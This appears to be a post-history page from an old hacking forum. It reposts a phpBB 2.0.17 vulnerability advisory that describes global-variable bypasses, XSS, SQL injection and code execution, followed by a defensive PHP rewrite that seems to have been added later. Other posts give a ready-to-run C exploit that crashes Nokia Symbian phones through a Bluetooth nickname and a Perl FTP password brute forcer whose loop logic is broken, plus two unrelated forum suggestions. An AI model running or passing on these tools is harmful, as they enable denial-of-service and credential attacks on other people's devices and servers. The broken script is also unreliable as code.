Show Topics
Pages: [1]
2
Computer Security / Web Level / New bug in phpbb<=2.0.17
on: 2 November 2005, 15:04 pm
hehe, well here goes another one for all the phpbbs.. To get rid of possible security problems caused by not properly initialised variables phpBB comes with the following piece of code, that is intended to deregister global variables, which were created because of the register_globals directive. Unfortunately there are at least 3 ways to bypass the protection.

// PHP4+ path
$not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

// Not only will array_merge give a warning if a parameter
// is not an array, it will actually fail. So we check if
// HTTP_SESSION_VARS has been initialised.
if (!isset($HTTP_SESSION_VARS))
{
    $HTTP_SESSION_VARS = array();
}

// Merge all into one extremely huge array; unset
// this later
$input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);

unset($input['input']);
unset($input['not_unset']);

while (list($var,) = @each($input))
{
    if (!in_array($var, $not_unset))
    {
        unset($$var);
    }
}

unset($input);
Bypass Vulnerabilities
----------------------
[1] In PHP5 <= 5.0.5 it is possible to register f.e. the global variable $foobar by supplying a GET/POST/COOKIE variable with the name 'foobar' but also by supplying a GPC variable called 'GLOBALS[foobar]'. If the variable is supplied in that way, the code above will not try to unset $foobar, but $GLOBALS, which completely bypasses the protection.
[2] When the session extension is not started by a call to session_start(), PHP does not know about the variables $_SESSION or $HTTP_SESSION_VARS, which means, it is possible to fill them with any value if register_globals is turned on. Combined with the fact (that was even documented in the phpBB code), that array_merge() will fail in PHP5, when at least one of the parameters is not an array, it is possible for an attacker to simply set HTTP_SESSION_VARS to a string and let the complete protection fail, because $input ends up empty.
[3] When register_long_array is turned off PHP does not know anymore about all the HTTP_* variables. This means they can be filled with anything that is completely unrelated to the existing global variables. It is obvious that the protection cannot work, when this configuration is chosen.
Additionally to the 3 possible ways to bypass the globals deregistration code, several not properly initialised variables were disclosed to the vendor, that can even lead to remote code execution.
Not properly initialised variables
----------------------------------
[1] Within usercp_register.php the variable 'error_msg' is not properly initialised and can therefore be used to inject arbitrary HTML code
[2] Within login.php the variable 'forward_page' is not properly initialised and can be used to inject arbitrary HTML code
[3] Within search.php the variable 'list_cat' is not properly initialised and can be used to inject arbitrary HTML
[4] Within usercp_register.php the variable 'signature_bbcode_uid' is not properly initialised and can be used for SQL injection of arbitrary 'field=xxx' statements into queries operating on the user table, when magic_quotes_gpc is turned off.
[5] The same variable [4] can be used to inject f.e. the 'e' modifier into the first parameter of a preg_replace() statement, which means, that the second parameter is evaluated as PHP code. Because the second parameter is entirely filled with the user supplied signature, it is possible to execute any PHP code. This can be exploited, no matter if magic_quotes_gpc is turned on or off, just 2 different code paths need to be triggered.
Proof of Concept:
The Hardened-PHP project is not going to release exploits for any of these vulnerabilities to the public.
http://www.securityfocus.com/bid/15246/info
http://www.securityfocus.com/bid/15243/info
http://www.zone-h.org/advisories/read/id=8348
regards.
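For the three bypasses the advisory describes, here is an added defensive rewrite of the deregistration routine (example code, not phpBB's or Hardened-PHP's; the function name phpbb_deregister_globals is assumed). It reads the short superglobals instead of the HTTP_*_VARS copies, validates every source with is_array() before merging, and unsets the contents of an injected GLOBALS[...] entry key by key; it only acts when register_globals is on, so it is a no-op on PHP 5.4 and later.

```php
<?php
// Added example (not phpBB's or Hardened-PHP's code): a deregistration
// routine that closes the three bypasses above. Hypothetical name; only
// meaningful on PHP < 5.4 with register_globals=On, a no-op otherwise.
function phpbb_deregister_globals()
{
    if (!ini_get('register_globals')) {
        return; // nothing was registered, so there is nothing to undo
    }
    // Bypass [3]: the short superglobals exist even when
    // register_long_arrays is off, so read them, not the HTTP_*_VARS copies.
    $sources = array($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES);
    if (isset($_SESSION)) {
        $sources[] = $_SESSION;
    }
    // Names that must survive: the superglobals, their long-array aliases
    // and the two phpBB globals the original $not_unset list protected.
    $keep = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_SERVER', '_ENV',
        '_FILES', '_SESSION', '_REQUEST', 'HTTP_GET_VARS', 'HTTP_POST_VARS',
        'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS',
        'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');
    // Bypass [2]: never hand array_merge() a non-array. A source that has
    // been replaced by a string is skipped instead of emptying $input.
    $input = array();
    foreach ($sources as $src) {
        if (is_array($src)) {
            $input = array_merge($input, $src);
        }
    }
    foreach ($input as $var => $value) {
        // Bypass [1]: a request key GLOBALS[foobar] arrives here as
        // $input['GLOBALS'] = array('foobar' => ...). Unset the inner
        // names one by one instead of attempting unset($GLOBALS).
        if ($var === 'GLOBALS') {
            if (is_array($value)) {
                foreach (array_keys($value) as $inner) {
                    if (!in_array($inner, $keep, true)) {
                        unset($GLOBALS[$inner]);
                    }
                }
            }
            continue;
        }
        if (!in_array($var, $keep, true)) {
            unset($GLOBALS[$var]);
        }
    }
}
```

Calling it once at the top of common.php, before any other global is read, is the intended use; variables the application itself initialises afterwards are unaffected.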
3
Communications / Hacking Mobile / Nokia Symbian 60 "Bluetooth Nickname" Remote Resta
on: 24 September 2005, 10:38 am
/* Nokia Bluetab Exploit Found & coded by Qnix - This Exploit will create a file called bluetab.txt with your bluetooth nickname, send the file to your nokia mobile, open it, copy the nickname and paste it to your bluetooth nickname; if anyone searches and finds your nickname his mobile will restart. - this exploit works on many other symbian and java mobiles.
Qnix - Qnix@bsdmail.org
*/
#include <stdio.h>
#define tab1 0x09
#define tab2 0x2E
#define dot1 0x0A

void msgm(void); /* prototype: msgm() is defined below main() */

int main(int argc, char *argv[])
{
    FILE *bluetab;
    if (argc < 2) {
        msgm();
        printf("Usage : ./bluetab <nickname>\n");
        return 0;
    } else {
        msgm();
        printf("bluetab.txt file created with your nickname . \n");
    }
    bluetab = fopen("bluetab.txt", "w");
    if (!bluetab) {
        msgm();
        printf("Some kind of file error!\n");
        return 0;
    }
    /* nickname followed by the three control bytes defined above */
    fprintf(bluetab, "%s%c%c%c", argv[1], tab1, tab2, dot1);
    fclose(bluetab);
    return 0;
}

void msgm(void)
{
    printf(" ------------------------------- \n");
    printf(" Nokia Bluetab Exploit \n");
    printf(" found & coded by \n");
    printf(" Qnix@bsdmail.org \n");
    printf(" ------------------------------- \n\n");
}
/* v1 2005-03-04 milw0rm.com */
# milw0rm.com [2005-09-23]
source zone-h. regards
4
Programming / Scripting / ~My first FTP Brute Force in Perl.~
on: 27 June 2005, 14:45 pm
These days off I've been programming a bit of Perl, and this morning I finished a brute force in Perl; here's the code:

#!/usr/bin/perl
# this program tries words from the @letras list until it finds the correct password.
# this script was written by sikik, under the bsd license.
use Net::FTP;
$username=admin; # could also be brute forced, but it would be very slow.
$dead=0;
while(1) {
    @letras=(a, b, c, aa, ab, ac, ba, bb, bc, ca, cb, cc); # if you want to use it you'll have to put in a much longer list.
    $password=@letras[$posicion];
    $ftp = Net::FTP->new("www.microsoft.com", Debug => 0) or $dead=1; # www.microsoft.com has to be replaced by the host we're attacking.
    $ftp->login($username, $password) or $dead=1;
    if($dead==0) {
        die("Password found, the password is: $password");
    }
};
9
General Forums / Suggestions and questions about the Forum / about the irc channel....
on: 26 October 2004, 07:03 am
Well, there's more and more riffraff coming into the channel and starting to insult people, type in caps etc., and when they get kicked out they come right back in, all the time; the opers are wasting their time on that riffraff. To fix that I propose that only people with registered nicks get voice, so if somebody acts like an idiot their nick gets banned and that's it. What do you say?
sal12
10
General Forums / Suggestions and questions about the Forum / about some posts
on: 13 July 2004, 08:10 am
Well, I see a lot of posts being closed on which I'd like to give my humble opinion, and I don't get time to because you've already shut them; besides, they're posts like koreano's farewell (just one example) that I don't understand why you close. As far as I know a post gets closed because somebody does something that isn't right, that could harm (the topic), or people misbehave :S and I haven't seen any of that in those posts. It's only a suggestion, don't get mad at me :'( sal12;